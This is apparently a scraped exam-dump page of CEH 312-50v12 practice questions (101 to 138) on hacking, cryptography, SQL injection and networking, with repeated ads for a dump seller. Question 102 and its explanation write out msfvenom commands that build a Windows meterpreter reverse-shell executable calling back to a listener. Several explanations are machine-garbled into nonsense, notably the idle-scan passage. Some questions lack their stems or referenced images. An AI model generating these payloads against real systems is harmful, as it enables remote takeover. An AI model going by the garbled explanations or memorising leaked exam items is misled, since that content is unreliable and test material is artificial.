Link:
By performing a penetration test, you gained access under a user account. During the test, you
established a connection with your own machine via the SMB service and occasionally entered
your login and password in plaintext.
Which file do you have to clean to clear the password?
A. .X session-log
B. .bashrc
C. .profile
D. .bash_history
Answer: (SHOW ANSWER)
NEW QUESTION: 102
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >
shell.exe
Answer: (SHOW ANSWER)
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom Often one of the most
useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple
payloads can be created with this module and it helps something that can give you a shell in
almost any situation. For each of these payloads you can go into msfconsole and select
exploit/multi/handler. Run 'set payload' for the relevant payload used and configure all necessary
options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples
below it's pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if
attacking within the network, WAN IP if attacking across the internet), and LPORT should be the
port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f exe > shell.exe
NEW QUESTION: 103
How can rainbow tables be defeated?
A. Use of non-dictionary words
B. All uppercase character passwords
C. Password salting
D. Lockout accounts under brute force password cracking attempts
Answer: (SHOW ANSWER)
Salt (cryptography) - Wikipedia
A salt is random data that is used as an additional input to a one-way function that hashes data, a
password, or passphrase. Salts are used to safeguard passwords in storage. Historically a
password was stored in plaintext on a system, but over time additional safeguards were
developed to protect a user's password against being read from the system. A salt is one of those
methods.
A new salt is randomly generated for each password. In a typical setting, the salt and the
password (or its version after key stretching) are concatenated and processed with a
cryptographic hash function, and the output hash value (but not the original password) is stored
with the salt in a database. Hashing allows for later authentication without keeping and therefore
risking exposure of the plaintext password in the event that the authentication data store is
compromised.
Salts defend against a pre-computed hash attack, e.g. rainbow tables. Since salts do not have to
be memorized by humans they can make the size of the hash table required for a successful
attack prohibitively large without placing a burden on the users. Since salts are different in each
case, they also protect commonly used passwords, or those users who use the same password
on several sites, by making all salted hash instances for the same password different from each
other.
NEW QUESTION: 104
ViruXine.W32 virus hides their presence by changing the underlying executable code.
This Virus code mutates while keeping the original algorithm intact, the code changes itself each
time it runs, but the function of the code (its semantics) will not change at all.
Here is a section of the Virus code:
What is this technique called?
A. Polymorphic Virus
B. Dravidic Virus
C. Stealth Virus
D. Metamorphic Virus
Answer: (SHOW ANSWER)
NEW QUESTION: 105
Susan, a software developer, wants her web API to update other applications with the latest
information. For this purpose, she uses a user-defined HTTP tailback or push APIs that are raised
based on trigger events: when invoked, this feature supplies data to other applications so that
users can instantly receive real-time Information.
Which of the following techniques is employed by Susan?
A. web shells
B. Webhooks
C. REST API
D. SOAP API
Answer: (SHOW ANSWER)
Webhooks are one of a few ways internet applications will communicate with one another.
It allows you to send real-time data from one application to another whenever a given event
happens.
For example, let's say you've created an application using the Foursquare API that tracks when
people check into your restaurant. You ideally wish to be able to greet customers by name and
provide a complimentary drink when they check in.
What a webhook will is notify you any time someone checks in, therefore you'd be able to run any
processes that you simply had in your application once this event is triggered.
The data is then sent over the web from the application wherever the event originally occurred, to
the receiving application that handles the data.
Here's a visual representation of what that looks like:
A webhook url is provided by the receiving application, and acts as a phone number that the other
application will call once an event happens.
Only it's more complicated than a phone number, because data about the event is shipped to the
webhook url in either JSON or XML format. this is known as the "payload." Here's an example of
what a webhook url looks like with the payload it's carrying:
What are Webhooks? Webhooks are user-defined HTTP callback or push APIs that are raised
based on events triggered, such as comment received on a post and pushing code to the registry.
A webhook allows an application to update other applications with the latest information. Once
invoked, it supplies data to the other applications, which means that users instantly receive realtime
information. Webhooks are sometimes called "Reverse APIs" as they provide what is
required for API specification, and the developer should create an API to use a webhook. A
webhook is an API concept that is also used to send text messages and notifications to mobile
numbers or email addresses from an application when a specific event is triggered. For instance,
if you search for something in the online store and the required item is out of stock, you click on
the "Notify me" bar to get an alert from the application when that item is available for purchase.
These notifications from the applications are usually sent through webhooks.
NEW QUESTION: 106
Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his
company's network infrastructure to identify security loopholes. In this process, he started to
circumvent the network protection tools and firewalls used in the company. He employed a
technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or
FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the
network resources. What is the attack technique used by Jude for finding loopholes in the above
scenario?
A. UDP flood attack
B. Peer-to-peer attack
C. Spoofed session flood attack
D. Ping-of-death attack
Answer: (SHOW ANSWER)
Valid 312-50v12 Dumps shared by PassTestKing.com for Helping Passing 312-50v12 Exam!
PassTestKing.com now offer the newest 312-50v12 exam dumps, the PassTestKing.com
312-50v12 exam questions have been updated and answers have been corrected get the
newest PassTestKing.com 312-50v12 dumps with Test Engine here:
https://www.passtestking.com/ECCouncil/312-50v12-practice-exam-dumps.html (505 Q&As
Dumps, 35%OFF Special Discount Code: freecram)
NEW QUESTION: 107
Ethical backer jane Doe is attempting to crack the password of the head of the it department of
ABC company. She Is utilizing a rainbow table and notices upon entering a password that extra
characters are added to the password after submitting. What countermeasure is the company
using to protect against rainbow tables?
A. Password key hashing
B. Password salting
C. Password hashing
D. Account lockout
Answer: (SHOW ANSWER)
Passwords are usually delineated as "hashed and salted". salting is simply the addition of a
unique, random string of characters renowned solely to the site to every parole before it's hashed,
typically this "salt" is placed in front of each password.
The salt value needs to be hold on by the site, which means typically sites use the same salt for
each parole. This makes it less effective than if individual salts are used.
The use of unique salts means that common passwords shared by multiple users - like "123456"
or "password" - aren't revealed revealed when one such hashed password is known - because
despite the passwords being the same the immediately and hashed values are not.
Large salts also protect against certain methods of attack on hashes, including rainbow tables or
logs of hashed passwords previously broken.
Both hashing and salting may be repeated more than once to increase the issue in breaking the
security.
NEW QUESTION: 108
What is the known plaintext attack used against DES which gives the result that encrypting
plaintext with one DES key followed by encrypting it with a second DES key is no more secure
than using a single key?
A. Man-in-the-middle attack
B. Meet-in-the-middle attack
C. Replay attack
D. Traffic analysis attack
Answer: (SHOW ANSWER)
Meet-in-the-middle attack - Wikipedia
The meet-in-the-middle attack (MITM), a known plaintext attack, is a generic space-time tradeoff
cryptographic attack against encryption schemes that rely on performing multiple encryption
operations in sequence. The MITM attack is the primary reason why Double DES is not used and
why a Triple DES key (168-bit) can be bruteforced by an attacker with 256 space and 2112
operations.
The intruder has to know some parts of plaintext and their ciphertexts. Using meet-in-the-middle
attacks it is possible to break ciphers, which have two or more secret keys for multiple encryption
using the same algorithm. For example, the 3DES cipher works in this way. Meet-in-the-middle
attack was first presented by Diffie and Hellman for cryptanalysis of DES algorithm.
NEW QUESTION: 109
_________ is a tool that can hide processes from the process list, can hide files, registry entries,
and intercept keystrokes.
A. Scanner
B. Backdoor
C. Trojan
D. RootKit
E. DoS tool
Answer: (SHOW ANSWER)
NEW QUESTION: 110
A. Whaling
B. Vishing
C. Spear phishing
D. Phishing
Answer: (SHOW ANSWER)
NEW QUESTION: 111
The following is an entry captured by a network IDS. You are assigned the task of analyzing this
entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel
processor. You figure that the attacker is attempting a buffer overflow attack.
You also notice "/bin/sh" in the ASCII part of the output.
As an analyst what would you conclude about the attack?
A. The attacker is attempting a buffer overflow attack and has succeeded
B. The buffer overflow attack has been neutralized by the IDS
C. The attacker is attempting an exploit that launches a command-line shell
D. The attacker is creating a directory on the compromised machine
Answer: (SHOW ANSWER)
NEW QUESTION: 112
Clark, a professional hacker, was hired by an organization lo gather sensitive Information about
its competitors surreptitiously. Clark gathers the server IP address of the target organization using
Whole footprinting. Further, he entered the server IP address as an input to an online tool to
retrieve information such as the network range of the target organization and to identify the
network topology and operating system used in the network. What is the online tool employed by
Clark in the above scenario?
A. AOL
B. ARIN
C. DuckDuckGo
D. Baidu
Answer: (SHOW ANSWER)
![search.arin.net](/proxy.php?image=https%3A%2F%2Fwww.arin.net%2Fimg%2Flogo-social.png&hash=2ab1d7e309bba3e8ee22f6bf10cd7713&return_error=1)
ARIN Whois/RDAP
ARIN is a nonprofit, member-based organization that administers IP addresses & ASNs in support of the operation and growth of the Internet.
NEW QUESTION: 113
SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may Bypass
authentication and allow attackers to access and/or modify data attached to a web application.
Which of the following SQLI types leverages a database server's ability to make DNS requests to
pass data to an attacker?
A. Union-based SQLI
B. Out-of-band SQLI
C. ln-band SQLI
D. Time-based blind SQLI
Answer: (SHOW ANSWER)
Out-of-band SQL injection occurs when an attacker is unable to use an equivalent channel to
launch the attack and gather results. ... Out-of-band SQLi techniques would believe the database
server's ability to form DNS or HTTP requests to deliver data to an attacker. Out-of-band SQL
injection is not very common, mostly because it depends on features being enabled on the
database server being used by the web application. Out-of-band SQL injection occurs when an
attacker is unable to use the same channel to launch the attack and gather results.
Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques,
especially if the server responses are not very stable (making an inferential time-based attack
unreliable).
Out-of-band SQLi techniques would rely on the database server's ability to make DNS or HTTP
requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree
command, which can be used to make DNS requests to a server an attacker controls; as well as
Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL
and PL/SQL to a server an attacker controls.
NEW QUESTION: 114
A penetration tester is performing the footprinting process and is reviewing publicly available
information about an organization by using the Google search engine.
Which of the following advanced operators would allow the pen tester to restrict the search to the
organization's web domain?
A. [allinurl:]
B. [location:]
C. [site:]
D. [link:]
Answer: (SHOW ANSWER)
Google hacking or Google dorking https://en.wikipedia.org/wiki/Google_hacking It is a hacker
technique that uses Google Search and other Google applications to find security holes in the
configuration and computer code that websites are using. Google dorking could also be used for
OSINT.
Search syntax https://en.wikipedia.org/wiki/Google_Search
Google's search engine has its own built-in query language. The following list of queries can be
run to find a list of files, find information about your competition, track people, get information
about SEO backlinks, build email lists, and of course, discover web vulnerabilities.
- [site:] - Search within a specific website
Incorrect answers:
- [allinurl:] - it can be used to fetch results whose URL contains all the specified characters
- [link:] - Search for links to pages
- [location:] - A tricky option.
NEW QUESTION: 115
In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been
disabled and confirmation is required before activation. The attackers then scam to collect not
one but two credit card numbers, ATM PIN number and other personal details. Ignorant users
usually fall prey to this scam.
Which of the following statement is incorrect related to this attack?
A. Do not send credit card numbers, and personal or financial information via e-mail
B. Do not trust telephone numbers in e-mails or popup ads
C. Do not reply to email messages or popup ads asking for personal or financial information
D. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks
E. Review credit card and bank account statements regularly
Answer: (SHOW ANSWER)
NEW QUESTION: 116
Firewalls are the software or hardware systems that are able to control and monitor the traffic
coming in and out the target network based on pre-defined set of rules. Which of the following
types of firewalls can protect against SQL injection attacks?
A. Data-driven firewall
B. Packet firewall
C. Web application firewall
D. Stateful firewall
Answer: (SHOW ANSWER)
Web application firewall - Wikipedia
A web application firewall (WAF) is a specific form of application firewall that filters, monitors, and
blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks
exploiting a web application's known vulnerabilities, such as SQL injection, cross-site scripting
(XSS), file inclusion, and improper system configuration.
NEW QUESTION: 117
Larry, a security professional in an organization, has noticed some abnormalities In the user
accounts on a web server. To thwart evolving attacks, he decided to harden the security of the
web server by adopting a countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the
web server?
A. Retain all unused modules and application extensions
B. Enable unused default user accounts created during the installation of an OS
C. Enable all non-interactive accounts that should exist but do not require interactive login
D. Limit the administrator or toot-level access to the minimum number of users
Answer: (SHOW ANSWER)
NEW QUESTION: 118
The establishment of a TCP connection involves a negotiation called three-way handshake. What
type of message does the client send to the server in order to begin this negotiation?
A. ACK
B. RST
C. SYN-ACK
D. SYN
Answer: (SHOW ANSWER)
NEW QUESTION: 119
Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP
cache of these switches.
If these switches' ARP cache is successfully flooded, what will be the result?
A. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to
attacks.
B. The switches will drop into hub mode if the ARP cache is successfully flooded.
C. Depending on the switch manufacturer, the device will either delete every entry in its ARP
cache or reroute packets to the nearest switch.
D. The switches will route all traffic to the broadcast address created collisions.
Answer: (SHOW ANSWER)
NEW QUESTION: 120
A. A man in the middle attack
B. A sniffing attack
C. A spoofing attack
D. A denial of service attack
Answer: (SHOW ANSWER)
NEW QUESTION: 121
Which of the following is the BEST way to defend against network sniffing?
A. Using encryption protocols to secure network communications
B. Register all machines MAC Address in a Centralized Database
C. Use Static IP Address
D. Restrict Physical Access to Server Rooms hosting Critical Servers
Answer: (SHOW ANSWER)
Sniffing attack - Wikipedia
To prevent networks from sniffing attacks, organizations and individual users should keep away
from applications using insecure protocols, like basic HTTP authentication, File Transfer Protocol
(FTP), and Telnet. Instead, secure protocols such as HTTPS, Secure File Transfer Protocol
(SFTP), and Secure Shell (SSH) should be preferred. In case there is a necessity for using any
insecure protocol in any application, all the data transmission should be encrypted. If required,
VPN (Virtual Private Networks) can be used to provide secure access to users.
NOTE: I want to note that the wording "best option" is valid only for the EC-Council's exam since
the other options will not help against sniffing or will only help from some specific attack vectors.
The sniffing attack surface is huge. To protect against it, you will need to implement a complex of
measures at all levels of abstraction and apply controls at the physical, administrative, and
technical levels. However, encryption is indeed the best option of all, even if your data is
intercepted - an attacker cannot understand it.
Valid 312-50v12 Dumps shared by PassTestKing.com for Helping Passing 312-50v12 Exam!
PassTestKing.com now offer the newest 312-50v12 exam dumps, the PassTestKing.com
312-50v12 exam questions have been updated and answers have been corrected get the
newest PassTestKing.com 312-50v12 dumps with Test Engine here:
https://www.passtestking.com/ECCouncil/312-50v12-practice-exam-dumps.html (505 Q&As
Dumps, 35%OFF Special Discount Code: freecram)
NEW QUESTION: 122
There are multiple cloud deployment options depending on how isolated a customer's resources
are from those of other customers. Shared environments share the costs and allow each
customer to enjoy lower operations expenses. One solution Is for a customer to Join with a group
of users or organizations to share a cloud environment. What is this cloud deployment option
called?
A. Hybrid
B. Community
C. Public
D. Private
Answer: (SHOW ANSWER)
The purpose of this idea is to permit multiple customers to figure on joint projects and applications
that belong to the community, where it's necessary to possess a centralized clouds infrastructure.
In other words, Community Cloud may be a distributed infrastructure that solves the precise
problems with business sectors by integrating the services provided by differing types of clouds
solutions.
The communities involved in these projects, like tenders, business organizations, and research
companies, specialise in similar issues in their cloud interactions. Their shared interests may
include concepts and policies associated with security and compliance considerations, and
therefore the goals of the project also .
Community Cloud computing facilitates its users to spot and analyze their business demands
better. Community Clouds could also be hosted during a data center, owned by one among the
tenants, or by a third-party cloud services provider and may be either on-site or off-site.
Community Cloud Examples and Use Cases
Cloud providers have developed Community Cloud offerings, and a few organizations are already
seeing the advantages . the subsequent list shows a number of the most scenarios of the
Community Cloud model that's beneficial to the participating organizations.
Multiple governmental departments that perform transactions with each other can have their
processing systems on shared infrastructure. This setup makes it cost-effective to the tenants,
and may also reduce their data traffic.
Benefits of Community Clouds
Community Cloud provides benefits to organizations within the community, individually also as
collectively. Organizations don't need to worry about the safety concerns linked with Public Cloud
due to the closed user group.
This recent cloud computing model has great potential for businesses seeking cost-effective
cloud services to collaborate on joint projects, because it comes with multiple advantages.
Openness and Impartiality
Community Clouds are open systems, and that they remove the dependency organizations wear
cloud service providers. Organizations are able to do many benefits while avoiding the
disadvantages of both public and personal clouds.
Flexibility and Scalability
Ensures compatibility among each of its users, allowing them to switch properties consistent with
their individual use cases. They also enable companies to interact with their remote employees
and support the utilization of various devices, be it a smartphone or a tablet. This makes this sort
of cloud solution more flexible to users' demands.
Consists of a community of users and, as such, is scalable in several aspects like hardware
resources, services, and manpower. It takes under consideration demand growth, and you simply
need to increase the user-base.
High Availability and Reliability
Your cloud service must be ready to make sure the availability of knowledge and applications in
the least times. Community Clouds secure your data within the same way as the other cloud
service, by replicating data and applications in multiple secure locations to guard them from
unforeseen circumstances.
Cloud possesses redundant infrastructure to form sure data is out there whenever and wherever
you would like it. High availability and reliability are critical concerns for any sort of cloud solution.
Security and Compliance
Two significant concerns discussed when organizations believe cloud computing are data security
and compliance with relevant regulatory authorities. Compromising each other's data security isn't
profitable to anyone during a Community Cloud.
Users can configure various levels of security for his or her data. Common use cases:
the power to dam users from editing and downloading specific datasets.
Making sensitive data subject to strict regulations on who has access to Sharing sensitive data
unique to a specific organization would bring harm to all or any the members involved.
What devices can store sensitive data.
Convenience and Control
Conflicts associated with convenience and control don't arise during a Community Cloud.
Democracy may be a crucial factor the Community Cloud offers as all tenants share and own the
infrastructure and make decisions collaboratively. This setup allows organizations to possess
their data closer to them while avoiding the complexities of a personal Cloud.
Less Work for the IT Department
Having data, applications, and systems within the cloud means you are doing not need to
manage them entirely. This convenience eliminates the necessity for tenants to use extra human
resources to manage the system. Even during a self-managed solution, the work is split among
the participating organizations.
Environment Sustainability
In the Community Cloud, organizations use one platform for all their needs, which dissuades
them from investing in separate cloud facilities. This shift introduces a symbiotic relationship
between broadening and shrinking the utilization of cloud among clients. With the reduction of
organizations using different clouds, resources are used more efficiently, thus resulting in a
smaller carbon footprint.
NEW QUESTION: 123
Which of the following Metasploit post-exploitation modules can be used to escalate privileges on
Windows systems?
A. getsystem
B. getuid
C. keylogrecorder
D. autoroute
Answer: (SHOW ANSWER)
NEW QUESTION: 124
what firewall evasion scanning technique make use of a zombie system that has low network
activity as well as its fragment identification numbers?
A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning
Answer: (SHOW ANSWER)
The idle scan could be a communications protocol port scan technique that consists of causing
spoofed packets to a pc to seek out out what services square measure obtainable. this can be
accomplished by impersonating another pc whose network traffic is extremely slow or nonexistent
(that is, not transmission or receiving information). this might be associate idle pc, known as a
"zombie".
This action are often done through common code network utilities like nmap and hping. The
attack involves causing solid packets to a particular machine target in an attempt to seek out
distinct characteristics of another zombie machine. The attack is refined as a result of there's no
interaction between the offender pc and also the target: the offender interacts solely with the
"zombie" pc.
This exploit functions with 2 functions, as a port scanner and a clerk of sure informatics
relationships between machines. The target system interacts with the "zombie" pc and distinction
in behavior are often discovered mistreatment totally different|completely different "zombies" with
proof of various privileges granted by the target to different computers.
The overall intention behind the idle scan is to "check the port standing whereas remaining utterly
invisible to the targeted host." The first step in execution associate idle scan is to seek out
associate applicable zombie. It must assign informatics ID packets incrementally on a worldwide
(rather than per-host it communicates with) basis. It ought to be idle (hence the scan name), as
extraneous traffic can raise its informatics ID sequence, confusing the scan logic. The lower the
latency between the offender and also the zombie, and between the zombie and also the target,
the quicker the scan can proceed.
Note that once a port is open, IPIDs increment by a pair of. Following is that the sequence:
offender to focus on -> SYN, target to zombie ->SYN/ACK, Zombie to focus on -> RST (IPID
increment by 1) currently offender tries to probe zombie for result. offender to Zombie -
>SYN/ACK, Zombie to offender -> RST (IPID increment by 1) So, during this method IPID
increments by a pair of finally.
When associate idle scan is tried, tools (for example nmap) tests the projected zombie and
reports any issues with it. If one does not work, attempt another. Enough net hosts square
measure vulnerable that zombie candidates are not exhausting to seek out. a standard approach
is to easily execute a ping sweep of some network. selecting a network close to your supply
address, or close to the target, produces higher results. you'll be able to attempt associate idle
scan mistreatment every obtainable host from the ping sweep results till you discover one that
works. As usual, it's best to raise permission before mistreatment someone's machines for
surprising functions like idle scanning.
Simple network devices typically create nice zombies as a result of {they square measure|they're}
normally each underused (idle) and designed with straightforward network stacks that are
susceptible to informatics ID traffic detection.
While distinguishing an acceptable zombie takes some initial work, you'll be able to keep re-using
the nice ones. as an alternative, there are some analysis on utilizing unplanned public internet
services as zombie hosts to perform similar idle scans. leverage the approach a number of these
services perform departing connections upon user submissions will function some quite poor's
man idle scanning.
NEW QUESTION: 125
What type of a vulnerability/attack is it when the malicious person forces the user's browser to
send an authenticated request to a server?
A. Session hijacking
B. Cross-site request forgery
C. Server side request forgery
D. Cross-site scripting
Answer: (SHOW ANSWER)
NEW QUESTION: 126
You need a tool that can do network intrusion prevention and intrusion detection, function as a
network sniffer, and record network activity, what tool would you most likely select?
A. Snort
B. Cain & Abel
C. Nessus
D. Nmap
Answer: (SHOW ANSWER)
NEW QUESTION: 127
Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?
A. USER, PASS
B. LOGIN, USER
C. USER, NICK
D. LOGIN, NICK
Answer: (SHOW ANSWER)
NEW QUESTION: 128
Every company needs a formal written document which spells out to employees precisely what
they are allowed to use the company's systems for, what is prohibited, and what will happen to
them if they break the rules. Two printed copies of the policy should be given to every employee
as soon as possible after they join the organization. The employee should be asked to sign one
copy, which should be safely filed by the company. No one should be allowed to use the
company's computer systems until they have signed the policy in acceptance of its terms.
What is this document called?
A. Information Audit Policy (IAP)
B. Company Compliance Policy (CCP)
C. Information Security Policy (ISP)
D. Penetration Testing Policy (PTP)
Answer: (SHOW ANSWER)
NEW QUESTION: 129
You are the Network Admin, and you get a complaint that some of the websites are no longer
accessible. You try to ping the servers and find them to be reachable. Then you type the IP
address and then you try on the browser, and find it to be accessible. But they are not accessible
when you try using the URL.
What may be the problem?
A. Traffic is Blocked on UDP Port 53
B. Traffic is Blocked on TCP Port 80
C. Traffic is Blocked on TCP Port 54
D. Traffic is Blocked on UDP Port 80
Answer: A (LEAVE A REPLY)
Most likely have an issue with DNS.
DNS stands for "Domain Name System." It's a system that lets you connect to websites by
matching human-readable domain names (like example.com) with the server's unique ID where a
website is stored.
Think of the DNS system as the internet's phonebook. It lists domain names with their
corresponding identifiers called IP addresses, instead of listing people's names with their phone
numbers. When a user enters a domain name like wpbeginner.com on their device, it looks up the
IP address and connects them to the physical location where that website is stored.
NOTE: Often DNS lookup information will be cached locally inside the querying computer or
remotely in the DNS infrastructure. There are typically 8 steps in a DNS lookup. When DNS
information is cached, steps are skipped from the DNS lookup process, making it quicker. The
example below outlines all 8 steps when nothing is cached.
The 8 steps in a DNS lookup:
1. A user types 'example.com' into a web browser, and the query travels into the Internet and is
received by a DNS recursive resolver;
2. The resolver then queries a DNS root nameserver;
3. The root server then responds to the resolver with the address of a Top-Level Domain (TLD)
DNS server (such as .com or .net), which stores the information for its domains. When searching
for example.com, our request is pointed toward the .com TLD;
4. The resolver then requests the .com TLD;
5. The TLD server then responds with the IP address of the domain's nameserver, example.com;
6. Lastly, the recursive resolver sends a query to the domain's nameserver;
7. The IP address for example.com is then returned to the resolver from the nameserver;
8. The DNS resolver then responds to the web browser with the IP address of the domain
requested initially; Once the 8 steps of the DNS lookup have returned the IP address for
example.com, the browser can request the web page:
9. The browser makes an HTTP request to the IP address;
10. The server at that IP returns the webpage to be rendered in the browser.
NOTE 2: DNS primarily uses the User Datagram Protocol (UDP) on port number 53 to serve
requests. And if this port is blocked, then a problem arises already in the first step. But the ninth
step is performed without problems.
NEW QUESTION: 130
A. Harden DNS servers
B. Restrict Zone transfers
C. Use the same machines for DNS and other applications
D. Have subnet diversity between DNS servers
E. Use split-horizon operation for DNS servers
Answer: (SHOW ANSWER)
NEW QUESTION: 131
The change of a hard drive failure is once every three years. The cost to buy a new hard drive is
$300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a
further 4 hours to restore the database from the last backup to the new hard disk. The recovery
person earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1(100%). What is
the closest approximate cost of this replacement and recovery operation per year?
A. $1320
B. $440
C. $100
D. $146
Answer: (SHOW ANSWER)
1. AV (Asset value) = $300 + (14 * $10) = $440 - the cost of a hard drive plus the work of a
recovery person, i.e.how much would it take to replace 1 asset? 10 hours for resorting the OS
and soft + 4 hours for DB restore multiplies by hourly rate of the recovery person.
2. SLE (Single Loss Expectancy) = AV * EF (Exposure Factor) = $440 * 1 = $440
3. ARO (Annual rate of occurrence) = 1/3 (every three years, meaning the probability of occurring
during 1 years is 1/3)
4. ALE (Annual Loss Expectancy) = SLE * ARO = 0.33 * $440 = $145.2
NEW QUESTION: 132
Take a look at the following attack on a Web Server using obstructed URL:
How would you protect from these attacks?
A. Configure the Web Server to deny requests involving "hex encoded" characters
B. Create rules in IDS to alert on strange Unicode requests
C. Use SSL authentication on Web Servers
D. Enable Active Scripts Detection at the firewall and routers
Answer: (SHOW ANSWER)
NEW QUESTION: 133
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in
the program exploit.c
What is the hexadecimal value of NOP instruction?
A. 0x90
B. 0x60
C. 0x70
D. 0x80
Answer: (SHOW ANSWER)
NEW QUESTION: 134
Kevin, an encryption specialist, implemented a technique that enhances the security of keys used
for encryption and authentication. Using this technique, Kevin input an initial key to an algorithm
that generated an enhanced key that is resistant to brute-force attacks. What is the technique
employed by Kevin to improve the security of encryption keys?
A. Key stretching
B. A Public key infrastructure
C. Key reinstallation
D. Key derivation function
Answer: A (LEAVE A REPLY)
NEW QUESTION: 135
Which rootkit is characterized by its function of adding code and/or replacing some of the
operating-system kernel code to obscure a backdoor on a system?
A. Library-level rootkit
B. Hypervisor-level rootkit
C. Kernel-level rootkit
D. User-mode rootkit
Answer: (SHOW ANSWER)
NEW QUESTION: 136
Which of the following statements about a zone transfer is correct? (Choose three.)
A. A zone transfer passes all zone information that a DNS server maintains
B. A zone transfer is accomplished with the nslookup service
C. A zone transfer is accomplished with the DNS
D. Zone transfers cannot occur on the Internet
E. A zone transfer passes all zone information that a nslookup server maintains
F. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
Answer: (SHOW ANSWER)
Valid 312-50v12 Dumps shared by PassTestKing.com for Helping Passing 312-50v12 Exam!
PassTestKing.com now offer the newest 312-50v12 exam dumps, the PassTestKing.com
312-50v12 exam questions have been updated and answers have been corrected get the
newest PassTestKing.com 312-50v12 dumps with Test Engine here:
https://www.passtestking.com/ECCouncil/312-50v12-practice-exam-dumps.html (505 Q&As
Dumps, 35%OFF Special Discount Code: freecram)
NEW QUESTION: 137
Yancey is a network security administrator for a large electric company. This company provides
power for over 100, 000 people in Las Vegas. Yancey has worked for his company for over 15
years and has become very successful. One day, Yancey comes in to work and finds out that the
company will be downsizing and he will be out of a job in two weeks. Yancey is very angry and
decides to place logic bombs, viruses, Trojans, and backdoors all over the network to take down
the company once he has left. Yancey does not care if his actions land him in jail for 30 or more
years, he just wants the company to pay for what they are doing to him.
What would Yancey be considered?
A. Because Yancey works for the company currently; he would be a White Hat
B. Yancey would be considered a Suicide Hacker
C. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing
D. Since he does not care about going to jail, he would be considered a Black Hat
Answer: (SHOW ANSWER)
NEW QUESTION: 138
Elliot is in the process of exploiting a web application that uses SQL as a back-end database.
He's determined that the application is vulnerable to SQL injection, and has introduced
conditional timing delays into injected queries to determine whether they are successful. What
type of SQL injection is Elliot most likely performing?
A. Blind SQL injection
B. Union-based SQL injection
C. NoSQL injection
D. Error-based SQL injection
Answer: (SHOW ANSWER)